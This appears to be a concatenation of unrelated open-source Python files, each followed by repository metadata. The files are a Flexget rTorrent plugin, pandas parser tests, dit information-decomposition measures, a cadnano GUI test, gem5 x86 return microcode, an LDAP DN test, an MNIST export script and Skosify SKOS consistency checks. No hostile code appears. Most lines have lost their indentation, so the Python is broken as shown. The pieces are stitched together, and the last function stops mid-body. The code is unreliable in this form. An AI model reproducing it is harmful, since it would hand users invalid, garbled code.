if config['action'] == 'update':
if task.options.test:
log.info('Would update %s (%s) in rTorrent', entry['title'], entry['torrent_info_hash'])
continue
self.update_entry(client, entry, config)
def delete_entry(self, client, entry):
try:
client.delete(entry['torrent_info_hash'])
log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash']))
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to delete: %s' % str(e))
return
def update_entry(self, client, entry, config):
info_hash = entry['torrent_info_hash']
# First check if it already exists
try:
existing = client.torrent(info_hash, fields=['base_path'])
except IOError as e:
entry.fail("Error updating torrent %s" % str(e))
return
        except xmlrpc_client.Error:
            existing = False
# Build options but make config values override entry values
try:
options = self._build_options(config, entry, entry_first=False)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
return
if existing and 'directory' in options:
# Check if changing to another directory which requires a move
if options['directory'] != existing['base_path'] \
and options['directory'] != os.path.dirname(existing['base_path']):
try:
log.verbose("Path is changing, moving files from '%s' to '%s'"
% (existing['base_path'], options['directory']))
client.move(info_hash, options['directory'])
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed moving torrent: %s' % str(e))
return
# Remove directory from update otherwise rTorrent will append the title to the directory path
if 'directory' in options:
del options['directory']
try:
client.update(info_hash, options)
log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash))
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to update: %s' % str(e))
return
def add_entry(self, client, entry, options, start=True, mkdir=False):
if 'torrent_info_hash' not in entry:
entry.fail('missing torrent_info_hash')
return
if entry['url'].startswith('magnet:'):
torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url'])
torrent_raw = torrent_raw.encode('ascii')
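            # Editorial illustration: a 60-character URI is wrapped as the
            # bencoded dict 'd10:magnet-uri60:<uri>e', which rTorrent accepts
            # in place of a real .torrent file.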
else:
# Check that file is downloaded
if 'file' not in entry:
raise plugin.PluginError('Temporary download file is missing from entry')
# Verify the temp file exists
if not os.path.exists(entry['file']):
raise plugin.PluginError('Temporary download file is missing from disk')
# Verify valid torrent file
if not is_torrent_file(entry['file']):
entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file'])
return
try:
with open(entry['file'], 'rb') as f:
torrent_raw = f.read()
except IOError as e:
entry.fail('Failed to add to rTorrent %s' % str(e))
return
try:
Torrent(torrent_raw)
except SyntaxError as e:
entry.fail('Strange, unable to decode torrent, raise a BUG: %s' % str(e))
return
# First check if it already exists
try:
if client.torrent(entry['torrent_info_hash']):
log.warning("Torrent %s already exists, won't add" % entry['title'])
return
except IOError as e:
entry.fail("Error checking if torrent already exists %s" % str(e))
except xmlrpc_client.Error:
# No existing found
pass
try:
resp = client.load(torrent_raw, fields=options, start=start, mkdir=mkdir)
if resp != 0:
entry.fail('Failed to add to rTorrent invalid return value %s' % resp)
except (IOError, xmlrpc_client.Error) as e:
log.exception(e)
entry.fail('Failed to add to rTorrent %s' % str(e))
return
# Verify the torrent loaded
try:
self._verify_load(client, entry['torrent_info_hash'])
log.info('%s added to rtorrent' % entry['title'])
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to verify torrent loaded: %s' % str(e))
def on_task_learn(self, task, config):
""" Make sure all temp files are cleaned up when entries are learned """
# If download plugin is enabled, it will handle cleanup.
if 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.cleanup_temp_files(task)
on_task_abort = on_task_learn
class RTorrentInputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'digest_auth': {'type': 'boolean', 'default': False},
'view': {'type': 'string', 'default': 'main'},
'fields': one_or_more({'type': 'string', 'enum': list(RTorrent.default_fields)}),
},
'required': ['uri'],
'additionalProperties': False
}
def on_task_input(self, task, config):
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
fields = config.get('fields')
try:
torrents = client.torrents(config['view'], fields=fields)
except (IOError, xmlrpc_client.Error) as e:
task.abort('Could not get torrents (%s): %s' % (config['view'], e))
return
entries = []
for torrent in torrents:
entry = Entry(
title=torrent['name'],
url='%s/%s' % (os.path.expanduser(config['uri']),
torrent['hash']),
path=torrent['base_path'],
torrent_info_hash=torrent['hash'],
)
for attr, value in torrent.items():
entry[attr] = value
entries.append(entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(RTorrentOutputPlugin, 'rtorrent', api_ver=2)
plugin.register(RTorrentInputPlugin, 'from_rtorrent', api_ver=2)
|
qk4l/Flexget
|
flexget/plugins/clients/rtorrent.py
|
Python
|
mit
| 26,286
| 0.001902
|
"""
Tests that apply specifically to the Python parser. Unless specifically
stated as a Python-specific issue, the goal is to eventually move as many of
these tests out of this module as soon as the C parser can accept further
arguments when parsing.
"""
import csv
from io import (
BytesIO,
StringIO,
)
import pytest
from pandas.errors import ParserError
from pandas import (
DataFrame,
Index,
MultiIndex,
)
import pandas._testing as tm
def test_default_separator(python_parser_only):
# see gh-17333
#
# csv.Sniffer in Python treats "o" as separator.
data = "aob\n1o2\n3o4"
parser = python_parser_only
expected = DataFrame({"a": [1, 3], "b": [2, 4]})
result = parser.read_csv(StringIO(data), sep=None)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("skipfooter", ["foo", 1.5, True])
def test_invalid_skipfooter_non_int(python_parser_only, skipfooter):
# see gh-15925 (comment)
data = "a\n1\n2"
parser = python_parser_only
msg = "skipfooter must be an integer"
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
def test_invalid_skipfooter_negative(python_parser_only):
# see gh-15925 (comment)
data = "a\n1\n2"
parser = python_parser_only
msg = "skipfooter cannot be negative"
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), skipfooter=-1)
@pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}])
def test_sniff_delimiter(python_parser_only, kwargs):
data = """index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), index_col=0, **kwargs)
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
def test_sniff_delimiter_comment(python_parser_only):
data = """# comment line
index|A|B|C
# comment line
foo|1|2|3 # ignore | this
bar|4|5|6
baz|7|8|9
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#")
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("encoding", [None, "utf-8"])
def test_sniff_delimiter_encoding(python_parser_only, encoding):
parser = python_parser_only
data = """ignore this
ignore this too
index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""
if encoding is not None:
from io import TextIOWrapper
data = data.encode(encoding)
data = BytesIO(data)
data = TextIOWrapper(data, encoding=encoding)
else:
data = StringIO(data)
result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding)
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
def test_single_line(python_parser_only):
# see gh-6607: sniff separator
parser = python_parser_only
result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None)
expected = DataFrame({"a": [1], "b": [2]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}])
def test_skipfooter(python_parser_only, kwargs):
# see gh-6607
data = """A,B,C
1,2,3
4,5,6
7,8,9
want to skip this
also also skip this
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), **kwargs)
expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")]
)
def test_decompression_regex_sep(python_parser_only, csv1, compression, klass):
# see gh-6607
parser = python_parser_only
with open(csv1, "rb") as f:
data = f.read()
data = data.replace(b",", b"::")
expected = parser.read_csv(csv1)
module = pytest.importorskip(compression)
klass = getattr(module, klass)
with tm.ensure_clean() as path:
tmp = klass(path, mode="wb")
tmp.write(data)
tmp.close()
result = parser.read_csv(path, sep="::", compression=compression)
tm.assert_frame_equal(result, expected)
def test_read_csv_buglet_4x_multi_index(python_parser_only):
# see gh-6607
data = """ A B C D E
one two three four
a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640
a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744
x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838"""
parser = python_parser_only
expected = DataFrame(
[
[-0.5109, -2.3358, -0.4645, 0.05076, 0.3640],
[0.4473, 1.4152, 0.2834, 1.00661, 0.1744],
[-0.6662, -0.5243, -0.3580, 0.89145, 2.5838],
],
columns=["A", "B", "C", "D", "E"],
index=MultiIndex.from_tuples(
[("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)],
names=["one", "two", "three", "four"],
),
)
result = parser.read_csv(StringIO(data), sep=r"\s+")
tm.assert_frame_equal(result, expected)
def test_read_csv_buglet_4x_multi_index2(python_parser_only):
# see gh-6893
data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9"
parser = python_parser_only
expected = DataFrame.from_records(
[(1, 3, 7, 0, 3, 6), (3, 1, 4, 1, 5, 9)],
columns=list("abcABC"),
index=list("abc"),
)
result = parser.read_csv(StringIO(data), sep=r"\s+")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("add_footer", [True, False])
def test_skipfooter_with_decimal(python_parser_only, add_footer):
# see gh-6971
data = "1#2\n3#4"
parser = python_parser_only
expected = DataFrame({"a": [1.2, 3.4]})
if add_footer:
# The stray footer line should not mess with the
# casting of the first two lines if we skip it.
kwargs = {"skipfooter": 1}
data += "\nFooter"
else:
kwargs = {}
result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"]
)
@pytest.mark.parametrize(
"encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"]
)
def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding):
# see gh-3404
expected = DataFrame({"a": [1], "b": [2]})
parser = python_parser_only
data = "1" + sep + "2"
encoded_data = data.encode(encoding)
result = parser.read_csv(
BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE])
def test_multi_char_sep_quotes(python_parser_only, quoting):
# see gh-13374
kwargs = {"sep": ",,"}
parser = python_parser_only
data = 'a,,b\n1,,a\n2,,"2,,b"'
if quoting == csv.QUOTE_NONE:
msg = "Expected 2 fields in line 3, saw 3"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), quoting=quoting, **kwargs)
else:
msg = "ignored when a multi-char delimiter is used"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), quoting=quoting, **kwargs)
def test_none_delimiter(python_parser_only, capsys):
# see gh-13374 and gh-17465
parser = python_parser_only
data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9"
expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]})
# We expect the third line in the data to be
# skipped because it is malformed, but we do
# not expect any errors to occur.
result = parser.read_csv(StringIO(data), header=0, sep=None, on_bad_lines="warn")
tm.assert_frame_equal(result, expected)
captured = capsys.readouterr()
assert "Skipping line 3" in captured.err
@pytest.mark.parametrize("data", ['a\n1\n"b"a', 'a,b,c\ncat,foo,bar\ndog,foo,"baz'])
@pytest.mark.parametrize("skipfooter", [0, 1])
def test_skipfooter_bad_row(python_parser_only, data, skipfooter):
# see gh-13879 and gh-15910
parser = python_parser_only
if skipfooter:
msg = "parsing errors in the skipped footer rows"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
else:
msg = "unexpected end of data|expected after"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
def test_malformed_skipfooter(python_parser_only):
parser = python_parser_only
data = """ignore
A,B,C
1,2,3 # comment
1,2,3,4,5
2,3,4
footer
"""
msg = "Expected 3 fields in line 4, saw 5"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), header=1, comment="#", skipfooter=1)
|
rs2/pandas
|
pandas/tests/io/parser/test_python_parser_only.py
|
Python
|
bsd-3-clause
| 9,378
| 0.000746
|
"""
The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent.
The idea is to measure unique information as the intrinsic mutual information between
a source and the target, given the other sources. It turns out that these unique values
are inconsistent, in that they produce differing redundancy values.
"""
from ..pid import BaseUniquePID
from ...multivariate.secret_key_agreement import (
no_communication_skar,
one_way_skar,
two_way_skar,
)
from ...utils import flatten
__all__ = (
'PID_SKAR_nw',
'PID_SKAR_owa',
'PID_SKAR_owb',
'PID_SKAR_tw',
)
class PID_SKAR_nw(BaseUniquePID):
"""
The two-way secret key agreement rate partial information decomposition.
Notes
-----
This method progressively utilizes better bounds on the SKAR, and if even when using
the tightest bounds does not result in a singular SKAR, nan is returned.
"""
_name = "I_>-<"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 >-< Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_nw : dict
The value of I_SKAR_nw for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = no_communication_skar(d, source, target, others)
return uniques
class PID_SKAR_owa(BaseUniquePID):
"""
The one-way secret key agreement rate partial information decomposition,
source to target.
"""
_name = "I_>->"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 >-> Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_owa : dict
The value of I_SKAR_owa for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = one_way_skar(d, source, target, others)
return uniques
class PID_SKAR_owb(BaseUniquePID):
"""
The one-way secret key agreement rate partial information decomposition,
target to source.
"""
_name = "I_<-<"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 <-< Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_owb : dict
The value of I_SKAR_owb for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = one_way_skar(d, target, source, others)
return uniques
class PID_SKAR_tw(BaseUniquePID):
"""
The two-way secret key agreement rate partial information decomposition.
Notes
-----
This method progressively utilizes better bounds on the SKAR, and if even when using
the tightest bounds does not result in a singular SKAR, nan is returned.
"""
_name = "I_<->"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 <-> Y || X_1), when possible.
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_tw : dict
The value of I_SKAR_tw for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = two_way_skar(d, [source, target], others)
return uniques
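# A hedged usage sketch (editorial, not part of this module). dit PID classes
# are typically instantiated directly with a Distribution:
#   from dit import Distribution
#   d = Distribution(['000', '011', '101', '110'], [0.25] * 4)  # two-input XOR
#   print(PID_SKAR_owa(d))  # prints the resulting partial information lattice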
|
dit/dit
|
dit/pid/measures/iskar.py
|
Python
|
bsd-3-clause
| 4,845
| 0.001032
|
# To run:
# pytest -c cadnano/tests/pytestgui.ini cadnano/tests/
import pytest
from PyQt5.QtCore import Qt, QPointF
from PyQt5.QtTest import QTest
from cadnano.fileio.lattice import HoneycombDnaPart
from cadnano.views.sliceview import slicestyles
from cnguitestcase import GUITestApp
@pytest.fixture()
def cnapp():
app = GUITestApp()
yield app
app.tearDown()
DELAY = 5 # milliseconds
RADIUS = slicestyles.SLICE_HELIX_RADIUS
####################### Standard Functional Tests ########################
def testCreateVirtualHelixGui(cnapp):
"""Create some VHs"""
# Create a new Honeycomb part
toolbar = cnapp.window.main_toolbar
action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb)
QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY)
slicerootitem = cnapp.window.views['slice'].root_item
assert len(slicerootitem.instance_items) == 1
slice_part_item = list(slicerootitem.instance_items.values())[0]
QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY)
QTest.keyClick(cnapp.window, Qt.Key_C, delay=DELAY)
cnapp.processEvents()
cmd_count = 1 # already added the part
for row in range(-2, 2):
for col in range(-2, 2):
# print(row, col)
x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col)
pt = QPointF(x, y)
cnapp.graphicsItemClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY)
cmd_count += 1
cnapp.processEvents()
vh_count = len(cnapp.document.activePart().getidNums())
# undo and redo all
for i in range(cmd_count):
cnapp.document.undoStack().undo()
cnapp.processEvents()
for i in range(cmd_count):
cnapp.document.undoStack().redo()
cnapp.processEvents()
part = list(cnapp.document.children())[0]
vh_count_after_redo = len(part.getidNums())
assert vh_count == vh_count_after_redo
# import time
# time.sleep(3)
# end def
|
scholer/cadnano2.5
|
cadnano/tests/functionaltest_gui.py
|
Python
|
mit
| 1,997
| 0.001502
|
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop RET_NEAR
{
# Make the default data size of rets 64 bits in 64 bit mode
.adjust_env oszIn64Override
ld t1, ss, [1, t0, rsp]
# Check address of return
addi rsp, rsp, dsz
wripi t1, 0
};
def macroop RET_NEAR_I
{
# Make the default data size of rets 64 bits in 64 bit mode
.adjust_env oszIn64Override
limm t2, imm
ld t1, ss, [1, t0, rsp]
# Check address of return
addi rsp, rsp, dsz
add rsp, rsp, t2
wripi t1, 0
};
def macroop RET_FAR {
.adjust_env oszIn64Override
# Get the return RIP
ld t1, ss, [1, t0, rsp]
# Get the return CS
ld t2, ss, [1, t0, rsp], ssz
# Get the rpl
andi t3, t2, 0x3
# Get the cpl
    # Here we'd check if we're changing privilege levels. We'll just hope
# that doesn't happen yet.
# Do stuff if they're equal
andi t0, t2, 0xFC, flags=(EZF,), dataSize=2
br label("processDescriptor"), flags=(CEZF,)
andi t3, t2, 0xF8, dataSize=8
andi t0, t2, 0x4, flags=(EZF,), dataSize=2
br label("globalDescriptor"), flags=(CEZF,)
ld t3, tsl, [1, t0, t3], dataSize=8
br label("processDescriptor")
globalDescriptor:
ld t3, tsg, [1, t0, t3], dataSize=8
processDescriptor:
chks t2, t3, IretCheck, dataSize=8
# There should be validity checks on the RIP checks here, but I'll do
# that later.
wrdl cs, t3, t2
wrsel cs, t2
wrip t0, t1
br label("end")
# Do other stuff if they're not.
end:
fault "NoFault"
};
'''
|
aferr/LatticeMemCtl
|
src/arch/x86/isa/insts/general_purpose/control_transfer/xreturn.py
|
Python
|
bsd-3-clause
| 3,641
| 0
|
import unittest
from plow.ldapadaptor import LdapAdaptor
class FakeLA(LdapAdaptor):
def bind(self, *args):
""" Nothing to see here move along """
initialize = bind
class Test_Ldap_DN_Compare(unittest.TestCase):
def setUp(self):
self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True)
self.ldap_case_s = FakeLA("uri", "base")
def _do_compare(self, ref, other, res, case_sensitive=True):
if case_sensitive:
match = self.ldap_case_s.compare_dn(ref, other)
else:
match = self.ldap_case_i.compare_dn(ref, other)
if res:
self.assertTrue(
match,
"Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive),
)
else:
self.assertFalse(
match,
"'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive),
)
def test_basic(self):
self._do_compare("CN=Test", "CN=test", False, case_sensitive=True)
self._do_compare("CN=Test", "CN=test", True, case_sensitive=False)
def test_spaces(self):
self._do_compare("CN=Test, OU=Base", "CN=Test,OU=Base", True)
self._do_compare(" CN = Test,OU = Base ", "CN=Test,OU=Base", True)
self._do_compare(" CN = Te st ", "CN=Te st", True)
if __name__ == '__main__':
unittest.main()
|
veloutin/plow
|
plow/tests/test_dn_compare.py
|
Python
|
lgpl-3.0
| 1,458
| 0.003429
|
# Script used to create Mnist_mini and Mnist_full datasets.
import numpy as np
from sklearn.datasets import fetch_mldata
from pandas import DataFrame
# Default download location for caching is
# ~/scikit_learn_data/mldata/mnist-original.mat unless specified otherwise.
mnist = fetch_mldata('MNIST original')
# Create DataFrame, group data by class.
df = DataFrame(mnist.data)
df['class'] = mnist.target
grouped = df.groupby('class')
# Write data feature values to file in Dataset directory by class.
for name, group in grouped:
# Create mini binary MNIST classification dataset for faster testing.
if int(name) < 2:
fname = 'Dataset/Mnist_mini/Class' + str(int(name)) + '.txt'
        np.savetxt(fname=fname, X=group[:200], fmt='%d', delimiter='\t', newline='\n')
# Create full MNIST classification for full application.
fname = 'Dataset/Mnist_full/Class' + str(int(name)) + '.txt'
np.savetxt(fname=fname, X=group, fmt='%d', delimiter='\t', newline='\n')
|
Sumukh/ParallelRF
|
mnist.py
|
Python
|
gpl-3.0
| 959
| 0.01147
|
# -*- coding: utf-8 -*-
"""Checks/fixes are bundled in one namespace."""
import logging
from rdflib.namespace import RDF, SKOS
from .rdftools.namespace import SKOSEXT
from .rdftools import localname, find_prop_overlap
def _hierarchy_cycles_visit(rdf, node, parent, break_cycles, status):
if status.get(node) is None:
status[node] = 1 # entered
for child in sorted(rdf.subjects(SKOS.broader, node)):
_hierarchy_cycles_visit(
rdf, child, node, break_cycles, status)
status[node] = 2 # set this node as completed
elif status.get(node) == 1: # has been entered but not yet done
if break_cycles:
logging.warning("Hierarchy cycle removed at %s -> %s",
localname(parent), localname(node))
rdf.remove((node, SKOS.broader, parent))
rdf.remove((node, SKOS.broaderTransitive, parent))
rdf.remove((node, SKOSEXT.broaderGeneric, parent))
rdf.remove((node, SKOSEXT.broaderPartitive, parent))
rdf.remove((parent, SKOS.narrower, node))
rdf.remove((parent, SKOS.narrowerTransitive, node))
else:
logging.warning(
"Hierarchy cycle detected at %s -> %s, "
"but not removed because break_cycles is not active",
localname(parent), localname(node))
elif status.get(node) == 2: # is completed already
pass
def hierarchy_cycles(rdf, fix=False):
"""Check if the graph contains skos:broader cycles and optionally break these.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing any skos:broader that overlaps
with skos:broaderTransitive.
"""
top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept))
status = {}
for cs, root in top_concepts:
_hierarchy_cycles_visit(
rdf, root, None, fix, status=status)
# double check that all concepts were actually visited in the search,
# and visit remaining ones if necessary
recheck_top_concepts = False
for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)):
if conc not in status:
recheck_top_concepts = True
_hierarchy_cycles_visit(
rdf, conc, None, fix, status=status)
return recheck_top_concepts
def disjoint_relations(rdf, fix=False):
"""Check if the graph contains concepts connected by both of the semantically
disjoint semantic skos:related and skos:broaderTransitive (S27),
and optionally remove the involved skos:related relations.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing skos:related relations that
overlap with skos:broaderTransitive.
"""
for conc1, conc2 in sorted(rdf.subject_objects(SKOS.related)):
if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)):
if fix:
logging.warning(
"Concepts %s and %s connected by both "
"skos:broaderTransitive and skos:related, "
"removing skos:related",
conc1, conc2)
rdf.remove((conc1, SKOS.related, conc2))
rdf.remove((conc2, SKOS.related, conc1))
else:
logging.warning(
"Concepts %s and %s connected by both "
"skos:broaderTransitive and skos:related, "
"but keeping it because keep_related is enabled",
conc1, conc2)
def hierarchical_redundancy(rdf, fix=False):
"""Check for and optionally remove extraneous skos:broader relations.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing skos:broader relations between
concepts that are otherwise connected by skos:broaderTransitive.
"""
for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)):
for parent2 in sorted(rdf.objects(conc, SKOS.broader)):
if parent1 == parent2:
continue # must be different
if parent2 in rdf.transitive_objects(parent1, SKOS.broader):
if fix:
logging.warning(
"Eliminating redundant hierarchical relationship: "
"%s skos:broader %s",
conc, parent2)
rdf.remove((conc, SKOS.broader, parent2))
rdf.remove((conc, SKOS.broaderTransitive, parent2))
rdf.remove((parent2, SKOS.narrower, conc))
rdf.remove((parent2, SKOS.narrowerTransitive, conc))
else:
logging.warning(
"Redundant hierarchical relationship "
"%s skos:broader %s found, but not eliminated "
"because eliminate_redundancy is not set",
conc, parent2)
def preflabel_uniqueness(rdf, policy='all'):
"""Check that concepts have no more than one value of skos:prefLabel per
language tag (S14), and optionally move additional values to skos:altLabel.
:param Graph rdf: An rdflib.graph.Graph object.
:param str policy: Policy for deciding which value to keep as prefLabel
when multiple prefLabels are found. Possible values are 'shortest'
(keep the shortest label), 'longest' (keep the longest label),
        'uppercase' (prefer uppercase), 'lowercase' (prefer lowercase) or
'all' (keep all, just log the problems). Alternatively, a list of
policies to apply in order, such as ['shortest', 'lowercase'], may
be used.
"""
resources = set(
(res for res, label in rdf.subject_objects(SKOS.prefLabel)))
policy_fn = {
'shortest': len,
'longest': lambda x: -len(x),
'uppercase': lambda x: int(x[0].islower()),
'lowercase': lambda x: int(x[0].isupper())
}
if type(policy) not in (list, tuple):
policies = policy.split(',')
else:
policies = policy
for p in policies:
if p not in policy_fn:
logging.critical("Unknown preflabel-policy: %s", policy)
return
def key_fn(label):
return [policy_fn[p](label) for p in policies] + [str(label)]
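    # Illustration (editorial): with policies == ['shortest'], the labels
    # ['Feline', 'Cat'] get sort keys [6, 'Feline'] and [3, 'Cat'], so 'Cat'
    # is kept as prefLabel and 'Feline' is demoted to skos:altLabel.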
for res in sorted(resources):
prefLabels = {}
for label in rdf.objects(res, SKOS.prefLabel):
lang = label.language
if lang not in prefLabels:
prefLabels[lang] = []
prefLabels[lang].append(label)
for lang, labels in prefLabels.items():
if len(labels) > 1:
if policies[0] == 'all':
logging.warning(
"Resource %s has more than one prefLabel@%s, "
"but keeping all of them due to preflabel-policy=all.",
res, lang)
continue
chosen = sorted(labels, key=key_fn)[0]
logging.warning(
"Resource %s has more than one prefLabel@%s: "
"choosing %s (policy: %s)",
res, lang, chosen, str(policy))
for label in labels:
if label != chosen:
rdf.remove((res, SKOS.prefLabel, label))
rdf.add((res, SKOS.altLabel, label))
def label_overlap(rdf, fix=False):
"""Check if concepts have the same value for any two of the pairwise
disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel
(S13), and optionally remove the least significant property.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing the least significant property
(altLabel or hiddenLabel).
"""
def label_warning(res, label, keep, remove):
if fix:
logging.warning(
"Resource %s has '%s'@%s as both %s and %s; removing %s",
res, label, label.language, keep, remove, remove
)
else:
logging.warning(
"Resource %s has '%s'@%s as both %s and %s",
res, label, label.language, keep, remove
)
